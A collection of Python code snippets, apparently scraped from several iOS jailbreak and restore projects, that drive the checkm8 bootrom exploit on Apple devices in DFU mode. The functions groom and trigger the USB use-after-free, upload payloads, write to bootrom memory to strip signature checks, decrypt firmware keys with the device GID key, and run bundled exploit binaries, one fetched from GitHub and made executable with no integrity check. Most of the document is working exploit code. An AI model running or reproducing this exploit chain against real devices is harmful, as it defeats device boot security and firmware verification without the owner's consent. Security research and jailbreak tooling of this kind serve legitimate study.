コード例 #1
ファイル: restore.py プロジェクト: WRFan/jailbreak10.3.3
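def pwndfumode_TEST():
    """Run the bundled ``ipwndfu -p`` step and, on success, strip signature checks.

    The DFU device is probed first (its serial string is read and discarded),
    then ``ipwndfu_geohot/ipwndfu -p`` is executed with stdout discarded.
    Exit status 0 is treated as success: the working directory is changed to
    ``../resources/ipwndfu`` and ``removesig()`` is called. Any other status
    prints a failure message and terminates the process with code 99.

    Raises:
        FileNotFoundError: if ``ipwndfu_geohot/ipwndfu`` is not present
            (the command is no longer routed through a shell).
    """
    # os.chdir("resources/ipwndfu")

    device = dfu.acquire_device()
    # Value is never used; the read is kept because the descriptor fetch is
    # presumably part of the device probe — confirm before removing.
    serial_number = device.serial_number
    dfu.release_device(device)

    # CPID:8960' in serial_number: # my1
    # runexploit = checkm8.exploit()

    # Argument list rather than a shell string: the command is fixed today,
    # but shell=False removes the injection surface should it become dynamic.
    cmd = ['ipwndfu_geohot/ipwndfu', '-p']
    so = subprocess.run(cmd, stdout=subprocess.DEVNULL)

    # The original tested `if so.returncode:`, which is true on a *non-zero*
    # status — i.e. on failure by the usual exit-status convention — so the
    # success/failure branches were inverted. Zero is taken as success here.
    if so.returncode == 0:
        print("Exploit worked!")
        os.chdir("../resources/ipwndfu")
        removesig()
    else:
        print('\033[91m' + "Exploit failed =(" + '\033[0m')
        exit(99)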
コード例 #2
ファイル: checkm8.py プロジェクト: xtiankisutsa/PyBoot
def xsigpatch():
    """Write prepared blocks into a fixed heap region of a pwned DFU device,
    run the device-side check routines, then upload and run ``bin/0x8015.bin``.

    Every address below is a constant for one specific bootrom build (the
    payload file name suggests CPID 8015 — confirm); the write/execute order
    is significant and must not be changed. Prints progress only, returns
    nothing.
    """

    device = dfu.acquire_device()
    serial_number = device.serial_number  # read but unused: no CPID check is done here
    dfu.release_device(device)
    device = usbexec.PwnedUSBDevice()  # NOTE(review): overwritten below before any use
    HEAP_BASE = 0x1801E8000
    HEAP_WRITE_OFFSET = 0x5000
    HEAP_WRITE_HASH = 0x10000D4EC
    HEAP_CHECK_ALL = 0x10000DB98
    HEAP_STATE = 0x1800086A0
    NAND_BOOT_JUMP = 0x10000188C
    BOOTSTRAP_TASK_LR = 0x180015F88
    DFU_BOOL = 0x1800085B0
    DFU_NOTIFY = 0x1000098B4
    DFU_STATE = 0x1800085E0
    TRAMPOLINE = 0x180018000
    # Eight little-endian 64-bit words each; block1 and block2 differ only in
    # the sixth word (132 vs 8).
    block1 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 132, 128, 0)
    block2 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 8, 128, 0)
    device = usbexec.PwnedUSBDevice()
    # Four blocks at 0x80 strides, then the device-side routine is run once
    # per block before the overall check.
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET, block1)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180)
    device.execute(0, HEAP_CHECK_ALL)
    print('Heap repaired.')
    # NOTE(review): the payload is opened in text mode and the handle is never
    # closed; `with open('bin/0x8015.bin', 'rb') as fh: payload = fh.read()`
    # looks like the intended form — confirm against write_memory's expected type.
    device.write_memory(TRAMPOLINE + 0x400, open('bin/0x8015.bin').read())
    device.execute(0, 0x180018400)  # == TRAMPOLINE + 0x400, where the payload was written
    print('Bootrom Patched')
コード例 #3
    def __init__(self):
        """Identify the connected DFU device and select its platform and config.

        Reads the serial string from the DFU device, picks the
        ``device_platform.all_platforms`` entry whose ``CPID:xxxx CPRV:xx ``
        prefix the serial starts with, then reads 0x100 bytes at
        ``image_base() + 0x200`` and picks the first ``configs`` entry whose
        ``match`` accepts them. Either lookup failing prints the offending
        value and exits the process with status 1.
        """
        self.config = None
        self.platform = None

        dfu_dev = dfu.acquire_device()
        self.serial_number = dfu_dev.serial_number
        dfu.release_device(dfu_dev)

        # First platform whose CPID/CPRV prefix matches the serial, else None.
        self.platform = next(
            (dp for dp in device_platform.all_platforms
             if self.serial_number.startswith('CPID:%04x CPRV:%02x ' %
                                              (dp.cpid, dp.cprv))),
            None,
        )
        if self.platform is None:
            print(self.serial_number)
            print('ERROR: No matching usbexec.platform found for this device.')
            sys.exit(1)

        # Probe bytes used to tell the image variants apart.
        info = self.read_memory(self.image_base() + 0x200, 0x100)
        self.config = next((cfg for cfg in configs if cfg.match(info)), None)
        if self.config is None:
            print(info)
            print('ERROR: No matching usbexec.config found for this image.')
            sys.exit(1)
コード例 #4
ファイル: restore.py プロジェクト: WRFan/jailbreak10.3.3
def pwndfumode():
    """Switch into the bundled ipwndfu directory and strip signature checks.

    Probes the DFU device (the serial string is fetched and the handle
    released; the value itself is not used) and then calls ``removesig()``.
    """
    os.chdir("resources/ipwndfu")

    dev = dfu.acquire_device()
    _serial = dev.serial_number  # descriptor read kept; value unused
    dfu.release_device(dev)

    removesig()
コード例 #5
ファイル: device.py プロジェクト: thuglifeproductions/Vieux
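def getecid():
    """Return the device ECID parsed from the DFU serial string, or None.

    The ECID is the token between ``ECID:`` and `` IBFL`` in the serial
    string. The DFU handle is released as soon as the serial has been read
    so later acquire calls do not contend with a stale handle; a serial
    without an ECID token prints an error and yields None.
    """
    device = dfu.acquire_device()
    try:
        serial = device.serial_number
    finally:
        dfu.release_device(device)

    # Non-greedy so only the token up to the next " IBFL" is captured.
    match = re.search(r'ECID:(.+?) IBFL', serial)
    if match is None:
        print('\033[91m' + "ERROR: Couldn't find ECID in serial" + '\033[0m')
        return None
    return match.group(1)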
コード例 #6
ファイル: pwn.py プロジェクト: sickcodes/PyBoot
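def decryptKBAG(kbag: str):
    """Decrypt *kbag* with the connected device's GID key via bundled ipwndfu.

    Picks the ipwndfu build by the ``CPID:`` token in the DFU serial string,
    runs ``ipwndfu --decrypt-gid=<kbag>``, strips the tool's
    "Decrypting with ... GID key." banner and returns the remaining output
    with its first and last characters removed (the original slicing, which
    trims the surrounding newlines). Unsupported CPIDs print a message and
    exit with status 0.

    Args:
        kbag: hex-encoded KBAG string.

    Raises:
        ValueError: if *kbag* is empty or not purely hexadecimal. The value is
            passed as a single argv element (no shell), so this is defence in
            depth rather than the injection guard itself.
    """
    import subprocess

    # Validate before touching the device: an odd value should fail fast.
    if not re.fullmatch(r'[0-9A-Fa-f]+', kbag):
        raise ValueError('kbag must be a non-empty hex string')

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    x_cpids = ("CPID:8960", "CPID:8965", "CPID:8010", "CPID:8015")
    keys_cpids = ("CPID:8000", "CPID:8003", "CPID:7000", "CPID:7001")
    if any(cpid in serial_number for cpid in x_cpids):
        tool = 'resources/ipwndfuX/ipwndfu'
    elif any(cpid in serial_number for cpid in keys_cpids):
        tool = 'resources/ipwndfuKeys/ipwndfu'
    else:
        print("Not supported...")
        exit(0)

    # Argument list with shell=False: `kbag` can never be interpreted by a
    # shell, unlike the original os.popen(f'... --decrypt-gid={kbag}').
    proc = subprocess.run(
        [tool, f'--decrypt-gid={kbag}'],
        stdout=subprocess.PIPE,
        universal_newlines=True,
    )
    ivkey = re.sub(r'Decrypting with \w+ GID key\.', '', proc.stdout)
    return ivkey[1:-1]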
コード例 #7
ファイル: restore.py プロジェクト: zhuangzp/Vieux
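def pwndfumode():
    """Put a supported DFU device into pwned DFU mode and strip signature checks.

    Changes into ``resources/ipwndfu``, reads the DFU serial string and
    dispatches on the ``CPID:`` token it contains:

    * ``CPID:8960`` or ``CPID:8965``: run ``checkm8.exploit()``; on success
      call ``removesig()``, otherwise print a failure message and exit 99.
    * ``CPID:8950``: 32-bit device — move back up one directory, tell the
      user to use normal mode, exit 2.
    * anything else: print the serial and exit 1.
    """
    os.chdir("resources/ipwndfu")

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    # Both CPIDs took byte-identical branches in the original; one branch
    # serves both so the two copies cannot drift apart.
    if 'CPID:8960' in serial_number or 'CPID:8965' in serial_number:
        if checkm8.exploit():
            print("Exploit worked!")
            removesig()
        else:
            print('\033[91m' + "Exploit failed =(" + '\033[0m')
            exit(99)

    elif 'CPID:8950' in serial_number:
        print("iPhone 5 found!")
        os.chdir("..")
        print(
            '\033[91m' +
            "You need to have your 32 Bit device in normal mode, not DFU. Restart it and try again"
            + '\033[0m')
        exit(2)

    else:
        print('Found:', serial_number)
        print('\033[91m' + 'ERROR: This device is not supported.' + '\033[0m')
        exit(1)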
コード例 #8
    def command(self, request_data, response_length):
        """Send *request_data* to the pwned device and read *response_length* bytes back.

        Re-acquires the DFU device, checks it is still the device this object
        was created for, performs the fixed control-transfer handshake, sends
        the request, reads the response and releases the device. The transfer
        sequence is order-sensitive; do not reorder the calls.

        NOTE(review): the ``assert`` statements are the only validation and are
        stripped under ``python -O``; explicit ``if ...: raise ValueError``
        checks would survive release runs. The device is also not released if a
        transfer or an assert fails part-way through.
        """
        assert 0 <= response_length <= USB_READ_LIMIT
        device = dfu.acquire_device()
        assert self.serial_number == device.serial_number
        dfu.send_data(device, b'\0' * 16)
        device.ctrl_transfer(0x21, 1, 0, 0, 0, 100)
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
        dfu.send_data(device, request_data)

        # HACK: a zero-length response is requested as one byte and that byte
        # dropped, presumably because a 0-length control read does not behave
        # the same on this path — confirm.
        # NOTE(review): `.tostring()` presumably comes from the array.array
        # that pyusb returns; it was removed from `array` in Python 3.9 and
        # `.tobytes()` is the drop-in replacement.
        if response_length == 0:
            response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0,
                                            response_length + 1,
                                            CMD_TIMEOUT).tostring()[1:]
        else:
            response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0,
                                            response_length,
                                            CMD_TIMEOUT).tostring()
        dfu.release_device(device)
        assert len(response) == response_length
        return response
コード例 #9
ファイル: pwn.py プロジェクト: sickcodes/PyBoot
def pwndfumodeKeys():
    """Put the connected DFU device into pwned DFU mode with the per-CPID tool.

    Reads the DFU serial string once and dispatches on its ``CPID:`` token:
    8960/8965 run ``checkm8.exploit()`` from ``resources/ipwndfu``; 8010, 8015
    and 8000/8003/7000/7001 run the bundled ``./ipwndfu -p`` from a
    CPID-specific directory and then re-read the serial looking for
    ``PWND:[checkm8]``. A device already reporting ``PWND:[checkm8]`` is left
    alone. When the tool reports no device, the user is prompted to re-enter
    DFU and the function calls itself; unsupported CPIDs exit with status 2.

    NOTE(review): the retry is unbounded recursion, and several branches keep
    executing after the recursive call returns (see the per-branch notes), so
    a retry can run the post-exploit check twice or fall out of the function
    silently. A loop with an attempt limit would be the safer shape.
    """

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    if "CPID:8960" in serial_number:
        # cwd guard: checkm8.py lives in resources/ipwndfu; the chdir is skipped
        # when a previous (recursive) attempt already moved there.
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            # NOTE(review): when the recursive attempt returns, this branch
            # simply falls through — nothing reports the combined outcome.
            pwndfumodeKeys  ()
    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            pwndfumodeKeys()
    elif "CPID:8010" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfu8010")
            # Fixed command string, no user-controlled data reaches the shell.
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                # NOTE(review): no `return` after the retry, so the check below
                # runs again once the recursive call comes back.
                pwndfumodeKeys()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            # NOTE(review): no else branch — a device that did not enter pwned
            # DFU falls out of the function with cwd still resources/ipwndfu8010.
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                os.chdir("../..")
                time.sleep(5)
                return

    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                # NOTE(review): same missing `return` as the 8010 branch.
                pwndfumodeKeys()
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuKeys")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                # NOTE(review): same missing `return` as the 8010 branch.
                pwndfumodeKeys()
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
        # Only reachable after a recursive retry has returned: every other path
        # above returns or exits first.
        return
    else:
        print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
        exit(2)
コード例 #10
ファイル: pwn.py プロジェクト: sickcodes/PyBoot
def pwndfumode():
    """Put the connected DFU device into pwned DFU mode with the per-CPID tool.

    Reads the DFU serial string once and dispatches on its ``CPID:`` token:
    8960 runs ``./pwnedDFU -p -f`` from ``resources/bin``; 8965 runs
    ``checkm8.exploit()`` plus ``rmsigchks.py``; 8010 downloads Fugu on first
    use and runs ``./Fugu rmsigchks``; 8015 runs ``./ipwndfu -p`` then
    ``./ipwndfu --patch``; 8000/8003/7000/7001 run a bundled eclipsa binary
    whose outcome cannot be observed. Where possible the serial is re-read
    afterwards and ``PWND:[checkm8]`` taken as success. Failures prompt the
    user and re-enter this function; unsupported CPIDs exit with status 2.

    NOTE(review): the retry is unbounded recursion and the 8010 branch keeps
    executing after the recursive call returns (see the notes inline), so the
    post-exploit check may run twice or the function may end silently.
    """

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    if "CPID:8960" in serial_number:
        # cwd guard: skip the chdir when a previous attempt already moved here.
        if not os.path.exists("pwnedDFU"):
            os.chdir("resources/bin")
        cmd = './pwnedDFU -p -f'
        so = os.popen(cmd).read()
        
        if "Device is now in pwned DFU mode!" in so:
            print("Exploit worked!")
            os.chdir("../..")
            return
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            os.chdir("../..")
            pwndfumode()

    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            pwndfumode()
    elif "CPID:8010" in serial_number:

        # Fugu is not bundled so that users can see it has not been modified;
        # the release binary is downloaded from LinusHenze's GitHub on first use.
        #
        # NOTE(review): the archive is fetched and made executable with no
        # integrity check, and a non-200 response would be written to fugu.zip
        # as-is. Call `r.raise_for_status()` and compare the download against a
        # pinned digest (e.g. EXPECTED_FUGU_SHA256 = "<sha256 of the pinned
        # release — fill in>") before extracting; `open(...).write(...)` also
        # leaves the file handle to the GC — use `with open('fugu.zip', 'wb')`.

        if os.path.exists("resources/Fugu_8010/Fugu"):
            pass
        else:
            os.mkdir("resources/Fugu_8010")

            print("Downloading latest Fugu release from LinusHenze's github...")
                
            if os.path.exists("fugu.zip"):
                os.remove("fugu.zip")

            url = "https://github.com/LinusHenze/Fugu/releases/download/v0.4/Fugu_v0.4.zip"
            r = requests.get(url, allow_redirects=True)

            open('fugu.zip', 'wb').write(r.content)

            if os.path.exists("fugu"):
                shutil.rmtree("fugu")
                os.mkdir("fugu")
            else:
                os.mkdir("fugu")
            
            shutil.move("fugu.zip", "fugu/fugu.zip")
            os.chdir("fugu")

            with ZipFile('fugu.zip', 'r') as zipObj:
                
                zipObj.extractall()
            
            os.chdir("../")

            shutil.move("fugu/fugu", "resources/Fugu_8010/Fugu")
            shutil.move("fugu/shellcode", "resources/Fugu_8010/shellcode")

            # Add the owner-execute bit to whatever mode the extracted file has.
            st = os.stat('resources/Fugu_8010/Fugu')
            os.chmod('resources/Fugu_8010/Fugu', st.st_mode | stat.S_IEXEC)

            shutil.rmtree("fugu")

            print("Fugu has now been installed!")

        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("Fugu"):
                os.chdir("resources/Fugu_8010")
            cmd = './Fugu rmsigchks'
            so = os.popen(cmd).read()
            #print(so)
            # NOTE(review): neither retry below is followed by `return`, so after
            # the recursive call comes back the second `if` and the check
            # further down run again.
            if "Exploiting iDevice: FAILED!" in so:
                print("Exploit failed, however re-expoilting without rebooting might work. Attempting now...")
                pwndfumode()
            if "Device could not be found!" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumode()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            # NOTE(review): no else branch — a device that did not enter pwned
            # DFU falls out of the function with cwd still resources/Fugu_8010.
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                os.chdir("../..")
                time.sleep(5)
                return

    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                # NOTE(review): missing `return` after the retry, as in the 8010 branch.
                pwndfumode()
            cmd = './ipwndfu --patch'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number:
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:8003" in serial_number:
        cmd = './resources/bin/eclipsa8003'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7000" in serial_number:
        cmd = './resources/bin/eclipsa7000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7001" in serial_number:
        # NOTE(review): 7001 runs the 8000 binary while the other three CPIDs
        # each have their own — confirm this is intentional and not a copy-paste slip.
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    else:
        print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
        exit(2)
コード例 #11
ファイル: pwn.py プロジェクト: risk510/PyBoot
def pwndfumode():
    """Put the connected DFU device into pwned DFU mode with the per-CPID tool.

    Reads the DFU serial string once and dispatches on its ``CPID:`` token:
    8960/8965 run ``checkm8.exploit()`` then ``rmsigchks.py`` from
    ``resources/ipwndfu``; 8010 runs ``./ipwndfu -p`` and, once the serial
    reports ``PWND:[checkm8]``, ``rmsigchks.py``; 8015 runs ``./ipwndfu -p``
    then ``./ipwndfu --patch``; 8000/8003/7000/7001 run a bundled eclipsa
    binary whose outcome cannot be observed. Failures prompt the user and
    re-enter this function; unsupported CPIDs exit with status 2.

    NOTE(review): the retry is unbounded recursion and the 8010/8015 branches
    keep executing after the recursive call returns (see the notes inline), so
    the post-exploit check may run twice or the function may end silently.
    """

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    if "CPID:8960" in serial_number:
        # cwd guard: checkm8.py lives in resources/ipwndfu; skip the chdir when a
        # previous (recursive) attempt already moved there.
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print(
                "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
            )
            input()
            pwndfumode()
    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print(
                "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
            )
            input()
            pwndfumode()
    elif "CPID:8010" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfu8010")
            # Fixed command string, no user-controlled data reaches the shell.
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print(
                    "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
                )
                input()
                # NOTE(review): no `return` after the retry, so the check below
                # runs again once the recursive call comes back.
                pwndfumode()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            # NOTE(review): no else branch — a device that did not enter pwned
            # DFU falls out of the function with cwd still resources/ipwndfu8010.
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                cmd = 'python2.7 rmsigchks.py'
                # NOTE(review): Popen returns immediately and is never waited on,
                # and `print(so)` prints the Popen object rather than the script's
                # output. `so = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                # universal_newlines=True); print(so.stdout)` would both wait for
                # rmsigchks.py and show what it printed, as the other branches do.
                so = subprocess.Popen(cmd, shell=True)
                print(so)
                os.chdir("../..")
                time.sleep(5)
                return

    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print(
                    "Exploit failed, reboot device into DFU mode and press enter to re-run checkm8"
                )
                input()
                # NOTE(review): missing `return` after the retry, as in the 8010 branch.
                pwndfumode()
            cmd = './ipwndfu --patch'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number:
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print(
            "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
        )
        return
    elif "CPID:8003" in serial_number:
        cmd = './resources/bin/eclipsa8003'
        so = os.popen(cmd).read()
        print(so)
        print(
            "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
        )
        return
    elif "CPID:7000" in serial_number:
        cmd = './resources/bin/eclipsa7000'
        so = os.popen(cmd).read()
        print(so)
        print(
            "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
        )
        return
    elif "CPID:7001" in serial_number:
        # NOTE(review): 7001 runs the 8000 binary while the other three CPIDs
        # each have their own — confirm this is intentional and not a copy-paste slip.
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print(
            "Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot"
        )
        return
    else:
        print(
            "Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP"
        )
        exit(2)
コード例 #12
ファイル: checkm8.py プロジェクト: xtiankisutsa/PyBoot
def exploit():
    """Run the checkm8 sequence against the connected DFU device.

    Returns True once the device reports ``PWND:[checkm8]`` (or immediately
    if the serial already carries a ``PWND:[`` tag); exits the process with
    status 1 if the final serial check fails. The device is acquired and
    released several times and the statements between those points are
    timing- and order-sensitive — do not reorder them or change the delays.
    """
    #print('*** checkm8 exploit by axi0mX ***')
    #print('*** modified version by Linus Henze ***')
    #print('*** s5l8965x support by Matthew Pierson ***')

    device = dfu.acquire_device()
    start = time.time()
    print('Found:', device.serial_number)
    if 'PWND:[' in device.serial_number:
        print('Device is already in pwned DFU Mode. Not executing exploit.')
        return True
    # Per-device payload and parameters, selected from the serial string.
    payload, config = exploit_config(device.serial_number)

    # Two parameter shapes: configs with `large_leak` set use the usb_req_*
    # helpers; the others use `hole`/`leak` counts with the plain helpers.
    if config.large_leak is not None:
        usb_req_stall(device)
        for i in range(config.large_leak):
            usb_req_leak(device)
        usb_req_no_leak(device)
    else:
        stall(device)
        for i in range(config.hole):
            no_leak(device)
        leak(device)
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    # Bare attribute access: presumably forces the serial descriptor to be read
    # before the next transfer — confirm before removing.
    device.serial_number
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, b'A' * 0x800, 0.0001)

    # Advance buffer offset before triggering the UaF to prevent trashing the heap
    # NOTE(review): str 'A' here vs bytes b'A' above looks like a Python 2
    # carry-over; confirm the helper accepts both on Python 3.
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0,
                                   'A' * config.overwrite_offset, 10)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)

    time.sleep(0.5)

    device = dfu.acquire_device()
    usb_req_stall(device)
    if config.large_leak is not None:
        usb_req_leak(device)
    else:
        for i in range(config.leak):
            usb_req_leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50)
    # Payload is sent in 0x800-byte chunks.
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                       payload[i:i + 0x800], 50)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    if 'PWND:[checkm8]' not in device.serial_number:
        print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
        sys.exit(1)
    print('Device is now in pwned DFU Mode.')
    print('(%0.2f seconds)' % (time.time() - start))
    dfu.release_device(device)
    return True